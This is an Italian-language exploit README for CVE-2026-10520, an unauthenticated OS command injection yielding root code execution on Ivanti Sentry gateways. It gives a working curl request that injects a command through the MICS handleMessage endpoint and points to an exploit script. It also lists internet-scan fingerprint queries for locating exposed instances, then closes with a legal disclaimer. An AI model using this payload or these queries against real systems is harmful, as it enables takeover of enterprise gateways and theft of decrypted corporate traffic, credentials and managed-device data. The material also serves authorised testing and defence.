
RCE a livello di root tramite iniezione di comandi del sistema operativo in Ivanti Sentry
Ivanti Sentry 07 (precedentemente MobileIron Sentry) è un gateway di sicurezza aziendale che funge da proxy per il traffico tra dispositivi mobili e risorse backend aziendali: email, SharePoint e applicazioni web interne. Applica le policy di Mobile Device Management (MDM), termina le sessioni mobili crittografate e gestisce l'autenticazione basata su certificati per il deployment di app aziendali. Le istanze di Sentry sono tipicamente esposte su internet sulla porta 8443, rendendo disponibile l'API di amministrazione MICS (Mobile Iron Configuration Service).
CVE-2026-10520 è una vulnerabilità di iniezione di comandi del sistema operativo non autenticata che colpisce Ivanti Sentry nelle versioni precedenti a R10.5.2, R10.6.2 e R10.7.1 (CVSSv3.1: 10 Critico, elencata nel CISA KEV). Il difetto risiede nell'endpoint MICS API /mics/api/v2/sentry/mics-config/handleMessage, che accetta comandi di sistema tramite un corpo codificato come URL, senza alcuna autenticazione o validazione dell'input. Un attaccante che raggiunge un endpoint vulnerabile può eseguire comandi arbitrari del sistema operativo come , ottenendo il controllo completo dell'host, inclusi traffico aziendale decifrato, credenziali memorizzate e tutti i dati dei dispositivi mobili gestiti.
message# Inietta il comando 'id' tramite l'endpoint MICS handleMessage (non è richiesta autenticazione)
curl -sk -X POST "http://example.com:8443/mics/api/v2/sentry/mics-config/handleMessage" \
-H "User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)" \
-H "Content-Type: application/x-www-form-urlencoded" \
-H "Connection: close" \
--data-urlencode "message=execute system /configuration/system/commandexec <commandexec><index>1</index><reqandres>id</reqandres></commandexec>"
python CVE-2026-10520-X7.py
title:"Ivanti System Manager: Sign In"body="sentry" && body="System Manager" && port="8443", title="Ivanti System Manager: Sign In", icon_hash=="1407597555"http.html:"Ivanti Standalone Sentry System Manager" port:8443 , http.title:Ivanti port:8443, http.html:"Ivanti" http.html:"Sentry" port:8443Questo repository e il suo contenuto sono forniti esclusivamente per legittima ricerca sulla sicurezza, penetration testing autorizzato, studio educativo e scopi difensivi. Accedendo o utilizzando questo materiale, riconosci la piena responsabilità di garantire che le tue attività siano conformi a tutte le leggi applicabili e di aver ottenuto la dovuta autorizzazione prima di testare o applicare queste tecniche a qualsiasi sistema di cui non sei proprietario.
Gli autori e i manutentori di questo progetto declinano ogni responsabilità per eventuali danni, conseguenze legali o abusi derivanti dall'applicazione di queste informazioni. Qualsiasi utilizzo per accesso non autorizzato, attività malevola o scopi illegali è espressamente vietato e non supportato.
Usa responsabilmente. Rispetta la legge. Testa solo ciò che possiedi o per cui hai esplicita autorizzazione scritta.
SCT-PL